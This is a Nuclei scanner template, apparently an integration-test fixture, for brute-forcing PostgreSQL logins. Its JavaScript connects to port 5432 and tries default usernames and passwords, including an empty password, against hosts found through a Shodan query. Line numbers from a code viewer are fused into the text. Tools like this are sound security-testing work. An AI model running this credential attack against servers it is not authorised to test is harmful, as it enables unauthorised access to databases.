Path: blob/dev/integration_tests/protocols/javascript/postgres-pass-brute.yaml
2843 views
id: postgres-pass-brute12info:3name: PostgreSQL Password Bruteforce4author: pdteam5severity: high6description: |7This template bruteforces passwords for protected PostgreSQL instances.8If PostgreSQL is not protected with password, it is also matched.9metadata:10shodan-query: product:"PostgreSQL"11tags: js,network,postgresql,authentication1213javascript:14- pre-condition: |15isPortOpen(Host,Port)1617code: |18const postgres = require('nuclei/postgres');19const client = new postgres.PGClient;20success = client.Connect(Host, Port, User, Pass);2122args:23Host: "{{Host}}"24Port: "5432"25User: "{{usernames}}"26Pass: "{{passwords}}"2728attack: clusterbomb29payloads:30usernames:31- postgres32- admin33- root34passwords:35- ""36- postgres37- password38- admin39- root40stop-at-first-match: true4142matchers:43- type: dsl44dsl:45- "success == true"46474849